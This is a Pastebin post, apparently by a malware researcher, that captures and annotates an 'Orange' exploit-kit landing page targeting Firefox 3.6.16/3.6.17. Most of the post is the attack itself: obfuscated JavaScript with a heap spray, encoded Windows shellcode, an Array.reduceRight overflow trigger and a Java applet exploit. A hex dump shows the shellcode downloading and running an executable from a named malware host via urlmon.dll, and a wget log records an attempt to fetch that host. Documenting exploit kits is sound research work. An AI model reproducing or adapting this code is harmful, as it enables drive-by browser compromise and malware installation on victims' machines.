API tools faq
paste
Advertisement
unixfreaxjp

Firefox Agent Test for the Orange EK

unixfreaxjp
Aug 30th, 2012
179
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.60 KB | None | 0 0
raw download clone embed print report
  1. -----------------------------
  2. Firefox Agent Test for the Orange EK;
  3. It is proved it drops mess adjusting to my firefox browser
  4. -----------------------------
  5. document.write("
  6. <applet archive=\"27\" code=\"KiaDA.class\" width=\"8\" height=\"18\"><param name=\"ur34\"
  7. value=\"103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110
  8. !113!120!108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!7
  9. 9!97!88!62!100!119!111!104!99!60!48!50!37!101!104!99!60!49!53\"><param name=\"enm3\" value
  10. =\"75!115!49!109!80!101!105!45!100!119!100\"></applet>");
  11. document.write("<object id=\"d\"><object>");
  12. document.write("<embed src=\"265\" width=\"508\" height=\"367\">");
  13. var myobject = document.getElementById('d');
  14. function GetUrl(){
  15. return "
  16. 103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110!113!120!
  17. 108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!79!97!88!6
  18. 2!100!119!111!104!99!60!48!50!37!101!104!99!60!49!53";
  19. }
  20. ;
  21. function myescape(input){
  22. var output = '';
  23. ff = 255;
  24. f = 0;
  25. if (input.length % 2){
  26. f = 1;
  27. }
  28. for (var i = 0; i < input.length; i += 2){
  29. output += '%u';
  30. if (i == (input.length - 1)){
  31. output += 'ff';
  32. }
  33. else {
  34. output = output + input.charCodeAt(i + 1).toString(16);
  35. }
  36. output += input.charCodeAt(i).toString(16);
  37. }
  38. if (!f){
  39. output = output + '%uffff';
  40. }
  41. return output;
  42. }
  43. ;
  44. function spray(){
  45. var ptrs = unescape("
  46. %u0000%u0048%u0c00%u5864%u704e%u5349%u587a%u4157%u6844%u564a%u5143%u4359%u7674%u666c%u6a71
  47. %u5174%u4a69%u414e%u4166%u0000%u26f0%u104c%u5846%u426e%u0000%u240c%u3410%u007c%u0c00%u5326
  48. %u1005%u6379%u624a%u7959%u694f%u4663%u4445%u4261%u574b%u6666%u4d71%u7148%u4153%u4b47%u4244
  49. %u6f72%u5942%u655a%u784e%u4a66%u6a68%u4c67%u7879%u002e%u0c00");
  50. var bheader = 0x12 / 2;
  51. var nullt = 0x2 / 2;
  52. var scode = unescape("
  53. %u5eeb%u335f%u99c0%u6a50%ub201%u5745%uf78b%u23b2%udf8b%uda03%u46b2%uda03%ub253%u030a%u8bda
  54. %uaafb%u8b5b%u50fe%u5750%u45b2%ufa03%ub2aa%u0323%ub2fa%u030b%u80fa%u003f%u0175%u5747%u5050
  55. %ub057%u66ff%uffb9%uf2ff%u4fae%u07c6%u5f00%u8b58%ub2fe%u0346%u53fa%uc68b%u5e05%u0000%u5000
  56. %u5656%u466a%u02eb%u79eb%u6a57%u5930%u8b64%u8b01%u0c40%u688b%u8b1c%u085d%u6d8b%u5500%u438b
  57. %u8b3c%u1844%u0b78%u74c0%u8d31%u1874%uad18%uad91%uc303%uad50%u3c8d%uad03%u2c8d%u8b03%u8f74
  58. %u03fc%u33f3%u33c0%u99d2%u03ac%uc1d0%u05c2%u7948%u8bf7%u2474%u3b08%u7416%ue206%u58e2%ueb5d
  59. %u58ba%ub70f%u4d54%u03fe%u901c%u5f5d%ud3ff%uebab%u579d%u7c8b%u0824%u6650%uffb8%uf200%u4fae
  60. %uc033%u0788%u5f58%u04c2%ue800%uff22%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff
  61. %uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff
  62. %uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%u1529%u54d2%ufabd
  63. %u4c58%u70cc%u6b77%uf259%u23cb%u6664%u11b4%u1fb1%u1a3e%u6363%u6363%u6363%u652e%u6578%u7500
  64. %u6c72%u6f6d%u2e6e%u6c64%uff6c%u7468%u7074%u2f3a%u642f%u6569%u6573%u2e6c%u6874%u6865%u6369
  65. %u6f6b%u7972%u6f6d%u6f74%u6d72%u6c69%u2e65%u6f63%u3a6d%u3338%u3238%u6f2f%u6873%u6250%u3f59
  66. %u7865%u6970%u3d64%u3331%u6626%u6469%u323d%u36") + unescape(myescape(GetUrl()));
  67. var payload = unescape("
  68. %u6c6e%u706c%u454d%u7453%u4a45%u7554%u616b%u6561%u526f%u7573%u1806%u101f%u828c%u1083%u0d7b
  69. %u103e%u8002%u102d%u876b%u1003%u0001%u1004%u0001%u0000%u6917%u104e%u1000%u0000%uc000%u102a
  70. %u0040%u0000%u0005%u102e%uc001%u102a%u1806%u101f%u9090%u9090%u3401%u102b%u9090%u9090") +
  71. scode;
  72. var tr_padding = unescape("%u0c0c%u0c0c");
  73. while (tr_padding.length < 0x7fa00){
  74. tr_padding += tr_padding;
  75. }
  76. var dummy = ptrs + payload + tr_padding;
  77. var hspray = dummy.substring(0, 0x7fa00 - bheader - nullt);
  78. HeapBlocks = new Array();
  79. for (i = 0; i < 0x100; i ++ ){
  80. HeapBlocks[i] += hspray;
  81. }
  82. }
  83. ;
  84. if ((navigator.userAgent.indexOf("Firefox/3.6.16") != - 1) || (navigator.userAgent.
  85. indexOf("Firefox/3.6.17") != - 1)){
  86. spray();
  87. obj = new Array();
  88. obj.length = 2197815302;
  89. f = function trigger(prev, myobj, indx, array){
  90. alert(myobj[0]);
  91. }
  92. ;
  93. obj.reduceRight(f, 1, 2, 3);
  94. }
  95. -----------------------------
  96. Generating java applet:
  97. -----------------------------
  98. <applet archive="27" code="KiaDA.class" width="8" height="18">
  99. <param name="ur34" value= "103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110!113!120!108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!79!97!88!62!100!119!111!104!99!60!48!50!37!101!104!99!60!49!53">
  100. <param name="enm3" value="75!115!49!109!80!101!105!45!100!119!100"></applet>
  101. ↑There goes the exploit
  102.  
  103.  
  104. -----------------------------
  105. Popping he below shellcode;
  106. -----------------------------
  107. eb 5e 5f 33 c0 99 50 6a 01 b2 45 57 8b f7 b2 23
  108. 8b df 03 da b2 46 03 da 53 b2 0a 03 da 8b fb aa
  109. 5b 8b fe 50 50 57 b2 45 03 fa aa b2 23 03 fa b2
  110. 0b 03 fa 80 3f 00 75 01 47 57 50 50 57 b0 ff 66
  111. b9 ff ff f2 ae 4f c6 07 00 5f 58 8b fe b2 46 03
  112. fa 53 8b c6 05 5e 00 00 00 50 56 56 6a 46 eb 02
  113. eb 79 57 6a 30 59 64 8b 01 8b 40 0c 8b 68 1c 8b
  114. 5d 08 8b 6d 00 55 8b 43 3c 8b 44 18 78 0b c0 74
  115. 31 8d 74 18 18 ad 91 ad 03 c3 50 ad 8d 3c 03 ad
  116. 8d 2c 03 8b 74 8f fc 03 f3 33 c0 33 d2 99 ac 03
  117. d0 c1 c2 05 48 79 f7 8b 74 24 08 3b 16 74 06 e2
  118. e2 58 5d eb ba 58 0f b7 54 4d fe 03 1c 90 5d 5f
  119. ff d3 ab eb 9d 57 8b 7c 24 08 50 66 b8 ff 00 f2
  120. ae 4f 33 c0 88 07 58 5f c2 04 00 e8 22 ff ff ff
  121. ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
  122. ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
  123. ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
  124. ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
  125. ff ff ff ff ff ff 29 15 d2 54 bd fa 58 4c cc 70
  126. 77 6b 59 f2 cb 23 64 66 b4 11 b1 1f 3e 1a 63 63
  127. 63 63 63 63 2e 65 78 65 00 75 72 6c 6d 6f 6e 2e
  128. 64 6c 6c ff 68 74 74 70 3a 2f 2f 64 69 65 73 65
  129. 6c 2e 74 68 65 68 69 63 6b 6f 72 79 6d 6f 74 6f
  130. 72 6d 69 6c 65 2e 63 6f 6d 3a 38 33 38 32 2f 6f
  131. 73 68 50 62 59 3f 65 78 70 69 64 3d 31 33 26 66
  132. 69 64 3d 32
  133.  
  134.  
  135. -----------------------------
  136. use kernel.dll & urlmon.dll
  137. -----------------------------
  138. target:
  139. http://diesel.thehickorymotormile.com:8382/oshPbY?expid=13&fid=2
  140.  
  141.  
  142.  
  143. -----------------------------
  144. Download efforts...
  145. -----------------------------
  146. --19:26:05-- http://diesel.thehickorymotormile.com:8382/oshPbY?expid=13
  147. => `oshPbY@expid=13'
  148. Resolving diesel.thehickorymotormile.com... 173.212.222.188
  149. Connecting to diesel.thehickorymotormile.com|173.212.222.188|:8382... connected.
  150. HTTP request sent, awaiting response... 502 Bad Gateway
  151.  
  152. -----------------------------
  153. Looks like the url is expired :-))
  154. -----------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!